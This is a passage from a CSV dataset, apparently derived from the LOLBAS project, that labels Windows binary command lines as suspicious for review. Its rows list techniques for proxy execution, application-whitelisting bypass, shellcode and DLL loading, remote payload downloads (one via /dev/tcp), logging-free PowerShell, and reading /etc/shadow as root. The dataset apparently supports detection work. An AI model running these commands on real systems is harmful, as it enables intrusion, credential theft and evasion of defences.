{PATH:.exe}",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Adplus.yml,adplus.exe,Execute,"[""T1127"", {""Execute"": ""CMD""}, {""Execute"": ""EXE""}]",All windows,0.85,False,Execute arbitrary commands and binaries from the context of adplus. Note that providing an output directory via '-o' is required.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a67008464a3fc647183cc47d,devinit.exe run -t msi-install -i {REMOTEURL:.msi},devinit.exe run -t msi-install -i {REMOTEURL:.msi},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Devinit.yml,Devinit.exe,Execute,"[""T1218.007"", {""Execute"": ""MSI""}, {""Execute"": ""Remote""}]","Windows 10, Windows 11",0.85,False,Downloads an MSI file to C:\Windows\Installer and then installs it.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4ba2cc300dacd00d1e806673,Mftrace.exe {PATH:.exe},Mftrace.exe {PATH:.exe},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Mftrace.yml,Mftrace.exe,Execute,"[""T1127"", {""Execute"": ""EXE""}]",Windows,0.85,False,Launch specified executable as a subprocess of Mftrace.exe.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 69563afaeed98bd4888bc2a0,nmcap.exe /network * /capture /file {PATH_ABSOLUTE:.cap},nmcap.exe /network * /capture /file {PATH_ABSOLUTE:.cap},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Nmcap.yml,Nmcap.exe,Reconnaissance,"[""T1040""]",Windows,0.85,False,"Start capture on all network adapters and save to specified .cap (circular) file. Optionally, one can add: - `/TerminateWhen /TimeAfter 30 seconds` to auto-terminate after a relative times (e.g. 30 seconds); - `/TerminateWhen /Time 04:52:00 AM 9/17/2025` to auto-terminate after a specific date/time; - `/TerminateWhen /KeyPress x` to terminate when a specific key is pressed. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c98d4a17c8b5e11fbacc4c54,"devtoolslauncher.exe LaunchForDeploy {PATH_ABSOLUTE:.exe} ""{CMD:args}"" test","devtoolslauncher.exe LaunchForDeploy {PATH_ABSOLUTE:.exe} ""{CMD:args}"" test",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Devtoolslauncher.yml,Devtoolslauncher.exe,Execute,"[""T1127"", {""Execute"": ""CMD""}]",Windows,0.85,False,The above binary will execute other binary.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review cee999925f702d5ba647006e,"devtoolslauncher.exe LaunchForDebug {PATH_ABSOLUTE:.exe} ""{CMD:args}"" test","devtoolslauncher.exe LaunchForDebug {PATH_ABSOLUTE:.exe} ""{CMD:args}"" test",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Devtoolslauncher.yml,Devtoolslauncher.exe,Execute,"[""T1127"", {""Execute"": ""CMD""}]",Windows,0.85,False,The above binary will execute other binary.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a6cdd64c583c1c426cad5248,csi.exe {PATH:.cs},csi.exe {PATH:.cs},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Csi.yml,csi.exe,Execute,"[""T1127"", {""Execute"": ""CSharp""}]",Windows,0.85,False,Use csi.exe to run unsigned C# code.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 8a5a5aa35d26bb2b7c5a9f96,Dxcap.exe -c {PATH_ABSOLUTE:.exe},Dxcap.exe -c {PATH_ABSOLUTE:.exe},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Dxcap.yml,Dxcap.exe,Execute,"[""T1127"", {""Execute"": ""EXE""}]",Windows,0.85,False,"Launch specified executable as a subprocess of dxcap.exe. Note that you should have write permissions in the current working directory for the command to succeed; alternatively, add '-file c:\path\to\writable\location.ext' as first argument.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 6cfe5f31f5aa07ff07fc14c0,dxcap.exe -usage,dxcap.exe -usage,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Dxcap.yml,Dxcap.exe,Execute,"[""T1127"", {""Execute"": ""EXE""}, {""Requires"": ""Rename""}]","Windows 10, Windows 11",0.85,False,"Once executed, `dxcap.exe` will execute `xperf.exe` in the same folder. Thus, if `dxcap.exe` is copied to a folder and an arbitrary executable is renamed to `xperf.exe`, `dxcap.exe` will spawn it.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ce046a6c66772e43fcb5b546,Tracker.exe /d {PATH:.dll} /c C:\Windows\write.exe,Tracker.exe /d {PATH:.dll} /c C:\Windows\write.exe,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Tracker.yml,Tracker.exe,Execute,"[""T1127"", {""Execute"": ""DLL""}]",Windows,0.85,False,Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review bdd25ba9bb478d314f1cb8b2,"DefaultPack.EXE /C:""{CMD}""","DefaultPack.EXE /C:""{CMD}""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/DefaultPack.yml,DefaultPack.EXE,Execute,"[""T1218"", {""Execute"": ""CMD""}]",Windows,0.85,False,"Use DefaultPack.EXE to execute arbitrary binaries, with added argument support.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 055e94d900c1d38b995db5be,teams.exe,teams.exe,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Teams.yml,Teams.exe,Execute,"[""T1218.015"", {""Execute"": ""Node.JS""}]","Windows 10, Windows 11",0.85,False,"Generate JavaScript payload and package.json, and save to ""%LOCALAPPDATA%\\Microsoft\\Teams\\current\\app\\"" before executing.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a289fff7ae7ede54a9f30192,"teams.exe --disable-gpu-sandbox --gpu-launcher=""{CMD} &&""","teams.exe --disable-gpu-sandbox --gpu-launcher=""{CMD} &&""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Teams.yml,Teams.exe,Execute,"[""T1218.015"", {""Execute"": ""CMD""}]","Windows 10, Windows 11",0.85,False,Teams spawns cmd.exe as a child process of teams.exe and executes the ping command,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b43d141d7df9d7776d5fb701,cdb.exe -cf {PATH:.wds} -o notepad.exe,cdb.exe -cf {PATH:.wds} -o notepad.exe,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Cdb.yml,Cdb.exe,Execute,"[""T1127"", {""Execute"": ""Shellcode""}]",Windows,0.85,False,Launch 64-bit shellcode from the specified .wds file using cdb.exe.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 05f32d47c7a3d6446e8bb36b,cdb.exe -pd -pn {process_name} .shell {CMD},cdb.exe -pd -pn {process_name} .shell {CMD},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Cdb.yml,Cdb.exe,Execute,"[""T1127"", {""Execute"": ""CMD""}]",Windows,0.85,False,Attaching to any process and executing shell commands.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 0e5afc30dbbe85a35e39a897,"cdb.exe -c {PATH:.txt} ""{CMD}""","cdb.exe -c {PATH:.txt} ""{CMD}""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Cdb.yml,Cdb.exe,Execute,"[""T1127"", {""Execute"": ""CMD""}]",Windows,0.85,False,Execute arbitrary commands and binaries using a debugging script (see Resources section for a sample file).,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c9921d1cb537eea04e7775b0,xsd.exe {REMOTEURL},xsd.exe {REMOTEURL},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/xsd.yml,xsd.exe,Download,"[""T1105"", {""Download"": ""INetCache""}]",Windows,0.85,False,Downloads payload from remote server,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 9f81ec61889efe2f71670c0b,fsianycpu.exe {PATH:.fsscript},fsianycpu.exe {PATH:.fsscript},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/FsiAnyCpu.yml,FsiAnyCpu.exe,AWL Bypass,"[""T1059"", {""Execute"": ""FSharp""}]",Windows 10 2004 (likely previous and newer versions as well),0.85,False,Execute F# code via script file,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 2c12f1364666f45d2514aabb,fsianycpu.exe,fsianycpu.exe,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/FsiAnyCpu.yml,FsiAnyCpu.exe,AWL Bypass,"[""T1059"", {""Execute"": ""FSharp""}]",Windows 10 2004 (likely previous and newer versions as well),0.85,False,Execute F# code via interactive command line,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f33440e997a907fada189f7c,mpiexec.exe {CMD},mpiexec.exe {CMD},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Mpiexec.yml,Mpiexec.exe,Execute,"[""T1127"", {""Execute"": ""CMD""}]",Windows,0.85,False,Executes a command via MPI command-line tool.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c450299913965a59c73cd1c1,OpenConsole.exe {PATH:.exe},OpenConsole.exe {PATH:.exe},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/OpenConsole.yml,OpenConsole.exe,Execute,"[""T1202"", {""Execute"": ""EXE""}]","Windows 10, Windows 11",0.85,False,Execute specified process with OpenConsole.exe as parent process,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f61a2523e4cf6cd9a1a1226e,winfile.exe {PATH:.exe},winfile.exe {PATH:.exe},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/winfile.yml,winfile.exe,Execute,"[""T1202"", {""Execute"": ""EXE""}]","Windows 10, Windows 11",0.85,False,Execute an executable file with WinFile as a parent process.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3f53fe42d756b3a4fe17c7ed,coregen.exe /L {PATH_ABSOLUTE:.dll} dummy_assembly_name,coregen.exe /L {PATH_ABSOLUTE:.dll} dummy_assembly_name,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Coregen.yml,coregen.exe,Execute,"[""T1055"", {""Execute"": ""DLL""}]",Windows,0.85,False,Loads the target .DLL in arbitrary path specified with /L.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 648d6d51653c24ad53c533f1,coregen.exe dummy_assembly_name,coregen.exe dummy_assembly_name,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Coregen.yml,coregen.exe,Execute,"[""T1055"", {""Execute"": ""DLL""}]",Windows,0.85,False,Loads the coreclr.dll in the corgen.exe directory (e.g. C:\Program Files\Microsoft Silverlight\5.1.50918.0).,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 236fb901dad1a80ce13f44b0,vstest.console.exe {PATH:.dll},vstest.console.exe {PATH:.dll},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/vstest.console.yml,vstest.console.exe,AWL Bypass,"[""T1127"", {""Execute"": ""DLL""}]","Windows 10, Windows 11",0.85,False,VSTest functionality may allow an adversary to executes their malware by wrapping it as a test method then build it to a .exe or .dll file to be later run by vstest.console.exe. This may both allow AWL bypass or defense bypass in general,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 2f508ea63e82964959bd6fec,appcert.exe test -apptype desktop -setuppath {PATH_ABSOLUTE:.exe} -reportoutputpath {PATH_ABSOLUTE:.xml},appcert.exe test -apptype desktop -setuppath {PATH_ABSOLUTE:.exe} -reportoutputpath {PATH_ABSOLUTE:.xml},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Appcert.yml,AppCert.exe,Execute,"[""T1127"", {""Execute"": ""EXE""}]",Windows,0.85,False,Execute an executable file via the Windows App Certification Kit command-line tool.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review efc1bd5cdc43db651217fb71,appcert.exe test -apptype desktop -setuppath {PATH_ABSOLUTE:.msi} -setupcommandline /q -reportoutputpath {PATH_ABSOLUTE:.xml},appcert.exe test -apptype desktop -setuppath {PATH_ABSOLUTE:.msi} -setupcommandline /q -reportoutputpath {PATH_ABSOLUTE:.xml},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Appcert.yml,AppCert.exe,Execute,"[""T1218.007"", {""Execute"": ""MSI""}]",Windows,0.85,False,Install an MSI file via an msiexec instance spawned via appcert.exe as parent process.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a5858c1f8281ab62c31b5f8b,vshadow.exe -nw -exec={PATH_ABSOLUTE:.exe} C:,vshadow.exe -nw -exec={PATH_ABSOLUTE:.exe} C:,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Vshadow.yml,Vshadow.exe,Execute,"[""T1202"", {""Execute"": ""EXE""}]","Windows 10, Windows 11",0.85,False,Executes specified executable from vshadow.exe.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review dcdaf1a6fab77acbbbb81084,mspub.exe {REMOTEURL},mspub.exe {REMOTEURL},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Mspub.yml,Mspub.exe,Download,"[""T1105"", {""Download"": ""INetCache""}]","Windows 10, Windows 11",0.85,False,Downloads payload from remote server,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 40f9f879281797efc45ba39e,wsl.exe -e /mnt/c/Windows/System32/calc.exe,wsl.exe -e /mnt/c/Windows/System32/calc.exe,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Wsl.yml,Wsl.exe,Execute,"[""T1202"", {""Execute"": ""EXE""}]","Windows 10, Windows Server 2019, Windows 11",0.85,False,Executes calc.exe from wsl.exe,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 10ed2fb2fef607e10258dda1,wsl.exe -u root -e cat /etc/shadow,wsl.exe -u root -e cat /etc/shadow,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Wsl.yml,Wsl.exe,Execute,"[""T1202"", {""Execute"": ""CMD""}]","Windows 10, Windows Server 2019, Windows 11",0.85,False,Cats /etc/shadow file as root,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e974e51d04e27a2de9033da6,"wsl.exe --exec bash -c ""{CMD}""","wsl.exe --exec bash -c ""{CMD}""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Wsl.yml,Wsl.exe,Execute,"[""T1202"", {""Execute"": ""CMD""}]","Windows 10, Windows Server 2019, Windows 11",0.85,False,Executes Linux command (for example via bash) as the default user (unless stated otherwise using `-u `) on the default WSL distro (unless stated otherwise using `-d `),primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 78cb7905f0a2105712ee2324,wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary',wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary',bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Wsl.yml,Wsl.exe,Download,"[""T1105""]","Windows 10, Windows Server 2019, Windows 11",0.85,False,Downloads file from 192.168.1.10,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ffb1f0ce36bcd0305f8ef410,wsl.exe,wsl.exe,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Wsl.yml,Wsl.exe,Execute,"[""T1218"", {""Execute"": ""CMD""}]","Windows 10, Windows Server 2019, Windows 11",0.85,False,"When executed, `wsl.exe` queries the registry value of `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Lxss\MSI\InstallLocation`, which contains a folder path (`c:\program files\wsl` by default). If the value points to another folder containing a file named `wsl.exe`, it will be executed instead of the legitimate `wsl.exe` in the program files folder.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 95a8ccddd48f09aa2577153f,bginfo.exe {PATH:.bgi} /popup /nolicprompt,bginfo.exe {PATH:.bgi} /popup /nolicprompt,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Bginfo.yml,Bginfo.exe,Execute,"[""T1218"", {""Execute"": ""WSH""}]",Windows,0.85,False,Execute VBscript code that is referenced within the specified .bgi file.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 64faf2de6d3a5692cac08781,\\10.10.10.10\webdav\bginfo.exe {PATH:.bgi} /popup /nolicprompt,\\10.10.10.10\webdav\bginfo.exe {PATH:.bgi} /popup /nolicprompt,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Bginfo.yml,Bginfo.exe,Execute,"[""T1218"", {""Execute"": ""WSH""}]",Windows,0.85,False,Execute bginfo.exe from a WebDAV server.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 0e59dde8495d8372ac07a9e4,\\live.sysinternals.com\Tools\bginfo.exe {PATH_SMB:.bgi} /popup /nolicprompt,\\live.sysinternals.com\Tools\bginfo.exe {PATH_SMB:.bgi} /popup /nolicprompt,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Bginfo.yml,Bginfo.exe,Execute,"[""T1218"", {""Execute"": ""WSH""}, {""Execute"": ""Remote""}]",Windows,0.85,False,This style of execution may not longer work due to patch.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 6115e9356b00332bade3b64f,squirrel.exe --download {REMOTEURL},squirrel.exe --download {REMOTEURL},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Squirrel.yml,Squirrel.exe,Download,"[""T1218""]",Windows 7 and up with Microsoft Teams installed,0.85,False,The above binary will go to url and look for RELEASES file and download the nuget package.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 735d46c9e8d1d52a7fa85eba,squirrel.exe --update {REMOTEURL},squirrel.exe --update {REMOTEURL},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Squirrel.yml,Squirrel.exe,AWL Bypass,"[""T1218"", {""Execute"": ""Nuget""}, {""Execute"": ""Remote""}]",Windows 7 and up with Microsoft Teams installed,0.85,False,"The above binary will go to url and look for RELEASES file, download and install the nuget package.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 9be67260d78ebefda0cc8de8,squirrel.exe --updateRollback={REMOTEURL},squirrel.exe --updateRollback={REMOTEURL},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Squirrel.yml,Squirrel.exe,AWL Bypass,"[""T1218"", {""Execute"": ""Nuget""}, {""Execute"": ""Remote""}]",Windows 7 and up with Microsoft Teams installed,0.85,False,"The above binary will go to url and look for RELEASES file, download and install the nuget package.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 86dd72c0ddc275eec2802a67,Powerpnt.exe {REMOTEURL},Powerpnt.exe {REMOTEURL},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Powerpnt.yml,Powerpnt.exe,Download,"[""T1105"", {""Download"": ""INetCache""}]",Windows,0.85,False,Downloads payload from remote server,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 09901d4543f23cb73038cab7,VSDiagnostics.exe start 1 /launch:{PATH:.exe},VSDiagnostics.exe start 1 /launch:{PATH:.exe},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/VSDiagnostics.yml,VSDiagnostics.exe,Execute,"[""T1127"", {""Execute"": ""EXE""}]","Windows 10, Windows 11",0.85,False,Starts a collection session with sessionID 1 and calls kernelbase.CreateProcessW to launch specified executable.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 56d78716f1c82c120454ebaf,"VSDiagnostics.exe start 2 /launch:{PATH:.exe} /launchArgs:""{CMD:args}""","VSDiagnostics.exe start 2 /launch:{PATH:.exe} /launchArgs:""{CMD:args}""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/VSDiagnostics.yml,VSDiagnostics.exe,Execute,"[""T1127"", {""Execute"": ""CMD""}]","Windows 10, Windows 11",0.85,False,Starts a collection session with sessionID 2 and calls kernelbase.CreateProcessW to launch specified executable. Arguments specified in launchArgs are passed to CreateProcessW.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 18ba8d4431fbede5b9567fb6,AppVLP.exe {PATH_SMB:.bat},AppVLP.exe {PATH_SMB:.bat},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Appvlp.yml,Appvlp.exe,Execute,"[""T1218"", {""Execute"": ""CMD""}]",Windows 10 w/Office 2016,0.85,False,Executes .bat file through AppVLP.exe,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 5d9a3b73a66b70b0bc2a0b54,"AppVLP.exe powershell.exe -c ""$e=New-Object -ComObject shell.application;$e.ShellExecute('{PATH:.exe}','', '', 'open', 1)""","AppVLP.exe powershell.exe -c ""$e=New-Object -ComObject shell.application;$e.ShellExecute('{PATH:.exe}','', '', 'open', 1)""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Appvlp.yml,Appvlp.exe,Execute,"[""T1218"", {""Execute"": ""EXE""}]",Windows 10 w/Office 2016,0.85,False,Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 91effe1f8d529aaffd8a9f29,SQLToolsPS.exe -noprofile -command Start-Process {PATH:.exe},SQLToolsPS.exe -noprofile -command Start-Process {PATH:.exe},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Sqltoolsps.yml,SQLToolsPS.exe,Execute,"[""T1218"", {""Execute"": ""PowerShell""}]",Windows,0.85,False,Run a SQL Server PowerShell mini-console without Module and ScriptBlock Logging.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d4a2f3506a873f9d9db1b416,ntsd.exe -g {CMD},ntsd.exe -g {CMD},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Ntsd.yml,Ntsd.exe,Execute,"[""T1127"", {""Execute"": ""CMD""}]",Windows,0.85,False,Launches command through the debugging process; optionally add `-G` to exit the debugger automatically.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 76c251be03ffae146ef37cd4,vsls-agent.exe --agentExtensionPath {PATH_ABSOLUTE:.dll},vsls-agent.exe --agentExtensionPath {PATH_ABSOLUTE:.dll},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/vsls-agent.yml,vsls-agent.exe,Execute,"[""T1218"", {""Execute"": ""DLL""}]",Windows 10 21H2 (likely previous and newer versions with modern versions of Visual Studio installed),0.85,False,Load a library payload using the --agentExtensionPath parameter (32-bit),primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3954805ca29530869d34db82,dtutil.exe /FILE {PATH_ABSOLUTE:.source.ext} /COPY FILE;{PATH_ABSOLUTE:.dest.ext},dtutil.exe /FILE {PATH_ABSOLUTE:.source.ext} /COPY FILE;{PATH_ABSOLUTE:.dest.ext},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Dtutil.yml,dtutil.exe,Copy,"[""T1105""]",Windows,0.85,False,Copy file from source to destination,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 5542aea910e3288804f2c0f2,Visio.exe {REMOTEURL},Visio.exe {REMOTEURL},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Visio.yml,Visio.exe,Download,"[""T1105"", {""Download"": ""INetCache""}]",Windows,0.85,False,Downloads payload from remote server,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 701d3b5cbe52b145d9e6936b,WinProj.exe {REMOTEURL},WinProj.exe {REMOTEURL},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Winproj.yml,WinProj.exe,Download,"[""T1105"", {""Download"": ""INetCache""}]",Windows,0.85,False,Downloads payload from remote server,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 13c687c56ee37dae57d339ab,procdump.exe -md {PATH:.dll} explorer.exe,procdump.exe -md {PATH:.dll} explorer.exe,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Procdump.yml,Procdump.exe,Execute,"[""T1202"", {""Execute"": ""DLL""}]","Windows 8.1 and higher, Windows Server 2012 and higher",0.85,False,Loads the specified DLL where DLL is configured with a 'MiniDumpCallbackRoutine' exported function. Valid process must be provided as dump still created.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review de09bbd550b3e64ed629d158,procdump.exe -md {PATH:.dll} foobar,procdump.exe -md {PATH:.dll} foobar,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Procdump.yml,Procdump.exe,Execute,"[""T1202"", {""Execute"": ""DLL""}]","Windows 8.1 and higher, Windows Server 2012 and higher",0.85,False,"Loads the specified DLL where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review eef1e10a76690129cfef16a4,wfc.exe {PATH_ABSOLUTE:.xoml},wfc.exe {PATH_ABSOLUTE:.xoml},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Wfc.yml,Wfc.exe,AWL Bypass,"[""T1127"", {""Execute"": ""XOML""}]",Windows 10 2004 (likely previous and newer versions as well),0.85,False,Execute arbitrary C# code embedded in a XOML file.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 716d43b303d8d12b3af768ea,ProtocolHandler.exe {REMOTEURL},ProtocolHandler.exe {REMOTEURL},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/ProtocolHandler.yml,ProtocolHandler.exe,Download,"[""T1105""]","Windows 10, Windows 11",0.85,False,Downloads payload from remote server,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3b44c07995a6e7ac6966a77a,fsi.exe {PATH:.fsscript},fsi.exe {PATH:.fsscript},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Fsi.yml,Fsi.exe,AWL Bypass,"[""T1059"", {""Execute"": ""FSharp""}]",Windows 10 2004 (likely previous and newer versions as well),0.85,False,Execute F# code via script file,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 5bb37fc2ab1bcdcd268ad542,fsi.exe,fsi.exe,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Fsi.yml,Fsi.exe,AWL Bypass,"[""T1059"", {""Execute"": ""FSharp""}]",Windows 10 2004 (likely previous and newer versions as well),0.85,False,Execute F# code via interactive command line,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 5d6c370d94092bb127a80e15,Sqlps.exe -noprofile,Sqlps.exe -noprofile,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Sqlps.yml,Sqlps.exe,Execute,"[""T1218"", {""Execute"": ""PowerShell""}]",Windows,0.85,False,Run a SQL Server PowerShell mini-console without Module and ScriptBlock Logging.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3e2822ceb9b3dd958fc4d48c,dotnet.exe {PATH:.dll},dotnet.exe {PATH:.dll},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Dotnet.yml,Dotnet.exe,AWL Bypass,"[""T1218"", {""Execute"": ""DLL (.NET)""}]",Windows 7 and up with .NET 